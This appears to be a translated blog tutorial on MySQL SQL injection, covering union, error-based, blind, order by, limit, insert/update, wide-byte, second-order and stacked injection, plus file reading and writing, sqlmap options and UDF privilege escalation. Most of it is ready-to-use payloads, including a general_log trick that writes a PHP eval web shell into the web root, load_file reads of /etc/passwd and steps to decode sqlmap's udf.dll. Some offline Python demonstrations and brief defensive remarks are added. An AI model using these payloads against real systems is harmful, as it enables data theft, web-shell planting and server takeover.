Common SQL injection methods and UDF privilege escalation

SQL injection summary

1. Union injection

Use order by N (the query errors once N exceeds the number of columns) or union select 1,2,3,... to determine the number of columns and which of them are echoed back in the page.

Get the current database: union select 1,database()--

Get the tables: union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--

Get the column names of a table: union select 1,group_concat(column_name) from information_schema.columns where table_name='' and table_schema=database()--

2. Error-based injection

select count(*),concat(floor(rand(0)*2),(select version()))x from user group by x;

select * from xxx where id='12' or extractvalue(1,concat(user(),0x7e,version()))

select * from xxx where id='12' or updatexml(1,concat(user(),0x7e,version()),1)

The floor(rand(0)*2) variant needs a table with at least three rows before the duplicate-key error is triggered. extractvalue()/updatexml() raise an XPATH syntax error that echoes the offending expression, but only its first 32 characters, so longer results are read in pieces with substr(); putting 0x7e (~) first makes sure the whole value is treated as invalid XPath and shows up in the message.

3. Blind injection

3.1 Boolean-based blind

First determine the length of the target string, then guess it one character at a time by testing the ASCII value of each character; true and false are told apart by the two different page responses. Using > instead of = and halving the range each time brings a printable character down to about seven requests.

select * from xxx where id='12' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=109

select ascii(substr(database(),1,1))=100;

3.2 Time-based blind

Same procedure, but the page looks identical whether the condition holds or not; the bit is leaked by whether the response is delayed.

select * from xxx where id='12' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>120,sleep(2),NULL)

4. order by injection

Input that lands after order by cannot be exploited with union, but an expression placed there is still evaluated, so error-based and time-based conditions work. In each payload the else branch of IF() either raises an error (user() is invalid XPath, a subquery returning two rows, an empty regexp) or sleeps, so the true/false of the condition is observable (the originals had spaces URL-encoded as +; they are shown decoded):

select * from xxx order by updatexml(1,if(1=1,1,user()),1)

select * from xxx order by IF(1=1,1,(select 1 union select 2))

select * from xxx order by (select 1 regexp if(1=1,1,0x00))

select * from xxx order by extractvalue(1,if(1=1,1,user()))

select * from xxx order by if(1=1,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test))

5. limit injection

5.1 Without order by

When the injection point comes after limit and there is no order by clause, a union select can simply be appended after the limit clause.

5.2 With order by

When an order by clause is present, union is not allowed after limit. For 5.0.0 < MySQL < 5.6.6 the PROCEDURE ANALYSE() clause may still follow limit and carry an error-based or time-based payload:

select id from users order by id limit 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(if(mid(version(),1,1) like 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

PROCEDURE ANALYSE() was deprecated in MySQL 5.7.18 and removed in 8.0, so this route does not exist on current servers.

6. insert / update injection

Data can be leaked by making it part of the value that is inserted or updated and then reading the row back through the application, or by combining with error-based injection. The trick below turns a string into a number so it fits a numeric column: substr() cuts out an 8-character chunk, hex() encodes it and conv(...,16,10) converts the hex to decimal. n is the chunk number (1, 2, ...). conv() works with 64-bit precision, so a chunk may hold at most 8 characters (16 hex digits); longer chunks overflow and the data is lost.

update xxx set id='1' | conv(hex(substr((select table_name from information_schema.tables where table_schema=schema() limit 0,1),1 + (n-1) * 8, 8)), 16, 10);

insert into users values (17,'james', 'bond'|conv(hex(substr(user(),1 + (n-1) * 8, 8)),16, 10));

## Note: the above does not necessarily work on newer MySQL versions (strict SQL mode, for instance, turns the implicit string-to-number conversion warning into an error).

update xxx set id='xx'+(select conv(hex(substr(user(),1 + (n-1) * 8, 8)),16, 10))+'xx'
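What the conv(hex(substr(...)),16,10) trick does to the data, and why the chunk is 8 characters, as an added example that is not from the original article. server_conv() models in Python what MySQL computes for conv(hex(substr(secret,start,length)),16,10), and decode_number() is the attacker-side step of turning the number read back from the row into text. The secret "root@localhost.localdomain" is a constructed stand-in for user(); the table layout in the generated insert is the article's.

```python
"""Round trip of the conv(hex(substr(...)),16,10) leak.

Added example; not from the original article. server_conv() is a model of the MySQL
expression, decode_number() is the attacker's decoding step. SECRET is constructed.
"""
UINT64_MAX = 2**64 - 1
SECRET = "root@localhost.localdomain"   # constructed; stands in for user()


def server_conv(secret: str, start: int, length: int) -> int:
    """Model of conv(hex(substr(secret, start, length)), 16, 10) on the server.
    substr() is 1-based. conv() works with 64-bit precision, so a hex string longer than
    16 digits cannot be represented; the model saturates at 2**64-1 to show the loss."""
    chunk = secret[start - 1:start - 1 + length].encode("latin-1")
    if not chunk:
        return 0                      # conv(hex(''),16,10) -> 0
    return min(int(chunk.hex(), 16), UINT64_MAX)


def decode_number(value: int) -> str:
    """Attacker side: turn the decimal read back from the inserted/updated row into text."""
    hexdigits = format(value, "x")
    if len(hexdigits) % 2:
        hexdigits = "0" + hexdigits
    return bytes.fromhex(hexdigits).decode("latin-1")


def insert_payload(n: int) -> str:
    """The article's insert form for the n-th 8-character chunk."""
    start = 1 + (n - 1) * 8
    return (f"insert into users values (17,'james','bond'|"
            f"conv(hex(substr(user(),{start},8)),16,10));")


def recover(secret: str, chunk_len: int = 8) -> str:
    """Drive the leak chunk by chunk (n = 1, 2, ...) until an empty chunk comes back.
    With chunk_len=8 the round trip is lossless."""
    out, n = [], 1
    while True:
        value = server_conv(secret, 1 + (n - 1) * chunk_len, chunk_len)
        if value == 0:
            break
        out.append(decode_number(value))
        n += 1
    return "".join(out)


def recover_with_original_bug(secret: str) -> str:
    """The payload as it is often copied: substr(..., 1+(n-1)*8, 8*n). From n=2 on the
    chunk is longer than 8 characters, conv() overflows and the text is destroyed."""
    out = []
    for n in (1, 2):
        value = server_conv(secret, 1 + (n - 1) * 8, 8 * n)
        out.append(decode_number(value))
    return "".join(out)


if __name__ == "__main__":
    print(insert_payload(1))
    print(recover(SECRET))                           # root@localhost.localdomain
    print(repr(recover_with_original_bug(SECRET)))   # second chunk comes back as 0xff bytes
```

The payloads on the page are submitted once per chunk with n incremented by hand; the loop in recover() is just that sequence without the web application in between.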

7. Wide-byte injection

When the connection character set is GBK (set names gbk) and the application escapes input with addslashes(), the backslash that addslashes() adds can be swallowed into a two-byte GBK character, which frees the quote that follows:

Input: username=%df%27or%201=1%23&password=123

After addslashes(): username=%df%5c%27or%201=1%23&password=123

As the database sees it: select * from users where username='運' or 1=1 #' and password='123';

%df is a valid GBK lead byte and %5c (the backslash) a valid trail byte, so the server reads the pair as the single character 運 and the %27 after it is an unescaped quote. Escaping with a function that knows the connection character set (mysql_real_escape_string() after mysql_set_charset()), or using utf8 throughout, does not have this problem.
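The byte-level view of the bypass, as an added example that is not from the original article. addslashes() is re-implemented in Python so the whole chain (URL-decoded bytes, escaped bytes, how the server decodes them under the connection character set) runs offline; the input is the article's username value and the remainder of the query is constructed. Decoding the same escaped bytes as UTF-8 is included for contrast: there the backslash survives and the quote stays escaped.

```python
"""Why %df%27 survives addslashes() when the connection charset is GBK.

Added example; not from the original article. addslashes() is re-implemented here;
PAYLOAD is the article's username parameter, the rest of the query is constructed.
"""
from urllib.parse import unquote_to_bytes

PAYLOAD = "%df%27or%201=1%23"     # the article's username parameter


def addslashes(data: bytes) -> bytes:
    """PHP addslashes(): backslash before ' " \\ and NUL; works on bytes, charset-blind."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\":
            out += b"\\" + bytes([b])
        elif b == 0:
            out += b"\\0"
        else:
            out.append(b)
    return bytes(out)


def escaped_bytes(param: str) -> bytes:
    """What the application sends to the database after URL decoding and escaping."""
    return addslashes(unquote_to_bytes(param))


def server_view(param: str, connection_charset: str) -> str:
    """The escaped bytes as the server decodes them under the connection character set.
    Under gbk, \\xdf\\x5c is one two-byte character and the backslash is gone."""
    return escaped_bytes(param).decode(connection_charset, errors="replace")


def quote_is_escaped(view: str) -> bool:
    """Is the first single quote still preceded by a backslash after decoding?"""
    i = view.find("'")
    return i > 0 and view[i - 1] == "\\"


def build_query(param: str, connection_charset: str) -> str:
    """The statement the server parses; constructed table and columns."""
    username = server_view(param, connection_charset)
    return f"select * from users where username='{username}' and password='123'"


if __name__ == "__main__":
    for cs in ("utf-8", "gbk"):
        status = "escaped" if quote_is_escaped(server_view(PAYLOAD, cs)) else "BYPASSED"
        print(cs, status, build_query(PAYLOAD, cs))
```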

8. Second-order injection

Second-order (stored) injection occurs when the value we submit is stored safely, but is later read back from the database and concatenated into another SQL statement without escaping.

Example: we register the user name 123'. addslashes() turns it into 123\' for the insert, but what is stored in the database is 123' (the backslash is only an escape inside the SQL literal). When the back end later builds a query from the stored user name it ends up with select * from xxx where username='123'', and the stray quote is injected into that second statement.
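The two steps described above, as an added example that is not from the original article. It uses an in-memory SQLite database so it runs offline; the table layout, the sample users and the role column are constructed. Registration is done correctly with a parameterized query, which is what addslashes() also achieves for the insert: the quote is stored verbatim. The profile lookup then concatenates the stored value into SQL, which is where the injection fires.

```python
"""Second-order injection: the value is stored safely, then trusted when read back.

Added example; not from the original article. In-memory SQLite; table and users are
constructed. register() is the safe first step, profile_vulnerable() the unsafe second one.
"""
import sqlite3


def setup() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        create table users(id integer primary key, username text, role text);
        insert into users(username, role) values ('alice', 'user'), ('bob', 'admin');
    """)
    return conn


def register(conn, username: str) -> int:
    """Step 1: store the user name safely (parameterized). Returns the new user's id."""
    cur = conn.execute("insert into users(username, role) values (?, 'user')", (username,))
    conn.commit()
    return cur.lastrowid


def profile_vulnerable(conn, user_id: int) -> list:
    """Step 2 as the article describes it: the user name read back from the database is
    trusted and pasted into a new statement."""
    (username,) = conn.execute("select username from users where id=?", (user_id,)).fetchone()
    sql = f"select id, username, role from users where username = '{username}'"
    return conn.execute(sql).fetchall()


def profile_safe(conn, user_id: int) -> list:
    """Same lookup with the stored value bound as a parameter: data stays data."""
    (username,) = conn.execute("select username from users where id=?", (user_id,)).fetchone()
    return conn.execute(
        "select id, username, role from users where username = ?", (username,)).fetchall()


def vulnerable_lookup_errors(conn, user_id: int) -> bool:
    """The article's 123' case: the stray quote makes the second statement invalid."""
    try:
        profile_vulnerable(conn, user_id)
    except sqlite3.Error:
        return True
    return False


if __name__ == "__main__":
    conn = setup()
    uid = register(conn, "x' or role='admin' --")   # stored exactly like this
    print(profile_vulnerable(conn, uid))   # returns bob, the admin account
    print(profile_safe(conn, uid))         # returns only the registered user
    print(vulnerable_lookup_errors(conn, register(conn, "123'")))  # True: syntax error
```

Escaping at the point of storage does not help here; the second statement has to bind or escape the value again, because data coming out of the database is still untrusted input.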

9. Stacked injection

When the client API allows several statements in one call, a semicolon ends the original statement and an arbitrary second one follows:

select * from users where id = 1; select 1,2,3;

Whether this works depends on the driver, not on MySQL itself: PHP's mysqli_multi_query() and PDO_MySQL accept stacked statements, mysql_query() and mysqli_query() do not. Stacked queries are what make set global ... and other non-SELECT statements reachable from an injection point.

10. os-shell after SQL injection

sqlmap's --os-shell option gives command execution through the injection. For MySQL behind a PHP site it works by writing a PHP stager into the web root with into outfile, so we must know the absolute path of the web root, the MySQL account must be allowed to write there (secure_file_priv permitting), and the web server must execute the dropped file; none of these conditions can be skipped.

11. File reading and writing after SQL injection

11.1 Requirements

secure_file_priv is a system variable that restricts the file read/write functions:

Empty string: no restriction.
NULL: file import and export are disabled.
A directory name: only files under that directory may be read or written.
Note: from 5.5.53 on the default value is NULL; earlier versions default to empty.

Three ways to view the current value:

select @@secure_file_priv;
select @@global.secure_file_priv;
show variables like 'secure_file_priv';

Changing it:

Add secure-file-priv= under [mysqld] in my.ini (or my.cnf), or start the server with mysqld.exe --secure-file-priv=. The variable is read-only at runtime, so it cannot be changed with set global from an injection point; a restart with the new setting is needed.

11.2 Reading

MySQL usually reads files with load_file():

select load_file(file_path);

Second method:

load data infile '/etc/passwd' into table test FIELDS TERMINATED BY '\n'; # reads a file on the server

Third method:

load data local infile '/etc/passwd' into table test FIELDS TERMINATED BY '\n'; # reads a file on the client

Limitations:

The first two require secure_file_priv to be empty or to point at a suitable directory, and the FILE privilege.
All three need the absolute path of the file to be read.
The file must be smaller than max_allowed_packet.
The local variant additionally needs local_infile enabled on both the client and the server.

11.3 Writing

By redirecting the general query log into the web root:

set global general_log=on;set global general_log_file='C:/phpStudy/WWW/123.php';select '<?php eval($_POST[123]) ?>';

The set statements need stacked queries; they are not available through an ordinary query injection. This route is not limited by secure_file_priv, but setting global variables needs the SUPER privilege and the MySQL service account must be able to write to the target path.

into outfile / into dumpfile:

select '<?php phpinfo(); ?>' into outfile 'c:/123.php';

into outfile writes a text row (terminators and escaping applied); into dumpfile writes a single row as raw bytes, which is what is needed for binaries such as a UDF library.

11.4 Extension

MySQL client arbitrary file read attack chain

A rogue MySQL server can answer the client's first query with a LOAD DATA LOCAL INFILE request, and a client that has local_infile enabled sends back the requested file. This works directly with the mysql command-line client; when PHP is the client, a query has to be executed after connecting, not just the connection itself. The reproduction failed under PHP 7.3.4 and succeeded under PHP 5.4.

12. Common sqlmap syntax

sqlmap.py

-u URL  Target URL; it must carry a parameter, e.g. ?id=1

-l LOGFILE  Parse targets from a proxy log file, for example a Burp log

-m BULKFILE  Scan multiple targets listed one per line in a text file

-r REQUESTFILE  Load a saved HTTP request (e.g. a POST request) from a file and test it

--method=METHOD  Force the HTTP method (GET or POST)

--data=DATA  Data string to send in the request body (the POST parameters)

--cookie=COOKIE  Cookie header value to use

--user-agent=AGENT  User-Agent header value to use

--random-agent  Use a randomly selected User-Agent

--referer=REFERER  Referer header value to use

-p TESTPARAMETER  Parameter(s) to test

--level=LEVEL  Level of tests to perform (1-5, default 1)

--string=STRING  For Boolean-based blind injection, when the true and false pages differ only slightly, a string that appears only in the true page, so sqlmap can tell the two apart

--technique=TECH  Injection techniques to use: B Boolean-based blind, E error-based, U union query, S stacked queries, T time-based blind, Q inline queries (default: all of them)

--time-sec=TIMESEC  Seconds of delay used to detect time-based blind injection (default 5)

--union-cols=UCOLS  Range of column counts to try for union query injection

--current-user  Retrieve the current DBMS user

--current-db  Retrieve the current database

--is-dba  Detect whether the current user is a DBA

--users  Enumerate DBMS users

--passwords  Enumerate DBMS user password hashes

--dbs  Enumerate the databases on the server

--tables  Enumerate the tables of the target database

--columns  Enumerate the columns of the target table

--dump  Dump the entries of the target table

--sql-query=QUERY  Execute a SQL statement

--sql-shell  Open an interactive SQL shell

--os-shell  Open an interactive operating-system shell on the database server and run commands remotely

13. UDF privilege escalation through SQL injection

A UDF (user defined function) is MySQL's extension interface: a user implements, in a shared library, functionality that is hard to express in SQL, and the new functions are then called from SQL statements exactly like built-in functions.

Conditions for UDF privilege escalation on Windows:

If the MySQL version is 5.1 or later, udf.dll must be placed in the lib\plugin folder of the MySQL installation directory (select @@plugin_dir; shows the exact path).
If the MySQL version is below 5.1, udf.dll is placed in c:\windows\system32 on Windows Server 2003 and in c:\winnt\system32 on Windows Server 2000.
We hold a MySQL account with insert and delete privileges on the mysql database (the mysql.func table), which are needed to create and drop functions.
We are able to write udf.dll into the corresponding directory.

select Host, user, plugin from mysql.user where user = substring_index(user(), '@', 1);

When the value of plugin is empty, privilege escalation is not possible; it should be mysql_native_password.

udf.dll ships with sqlmap under sqlmap/udf/mysql/windows/ in 32-bit and 64-bit versions; the bitness is that of the MySQL server process, not of the operating system. The files in sqlmap are stored encoded and must be decoded first with sqlmap/extra/cloak/cloak.py (python cloak.py -d -i lib_mysqludf_sys.dll_ -o lib_mysqludf_sys.dll).

During privilege escalation only the functions exported by the dll file can be used.

Origin blog.csdn.net/qq_43645782/article/details/105468416